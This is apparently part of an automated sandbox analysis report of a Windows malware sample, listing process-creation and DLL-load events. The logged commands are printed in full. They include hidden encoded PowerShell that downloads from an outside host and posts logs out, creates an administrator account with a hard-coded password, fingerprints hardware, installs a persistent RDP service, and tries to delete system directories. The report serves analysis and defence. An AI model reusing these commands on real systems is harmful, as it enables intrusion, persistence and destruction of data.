EUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2347.tmp" "c:\Users\user\AppData\Local\Temp\oho2nqxk\CSC33DBF5592E3045FEA3FE203350D9DA4A.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
